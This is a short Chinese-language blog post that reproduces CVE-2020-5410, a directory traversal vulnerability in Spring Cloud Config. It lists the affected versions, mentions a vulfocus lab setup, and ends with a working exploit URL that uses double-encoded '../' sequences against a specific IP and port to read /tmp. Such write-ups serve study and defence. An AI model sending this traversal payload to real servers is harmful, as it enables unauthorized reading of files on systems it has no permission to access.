Spring Cloud Config 目录穿越漏洞复现（CVE-2020-5410）

发表于 2020-09-29 更新于 2020-10-20 分类于漏洞复现阅读次数：
本文字数： 364 阅读时长 ≈ 1 分钟

漏洞描述

Spring Cloud Config 为分布式系统中的外部配置提供服务器和客户端支持，使用 Config Server ，用户可以在所有环境中管理应用程序的外部属性。
近日，百度云安全团队监测到 Spring Cloud Config 官方发布了一个目录遍历漏洞的风险通告，漏洞编号为 CVE-2020-5410 。攻击者可通过构造特殊的 HTTP 请求，从而跨目录读取文件。

影响版本

2.2.x<=2.2.2 2.1.x<=2.1.8

环境搭建

使用vulfocus启动漏洞环境

漏洞复现

直接访问
http://47.101.62.20:48259/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Ftmp%23foo/development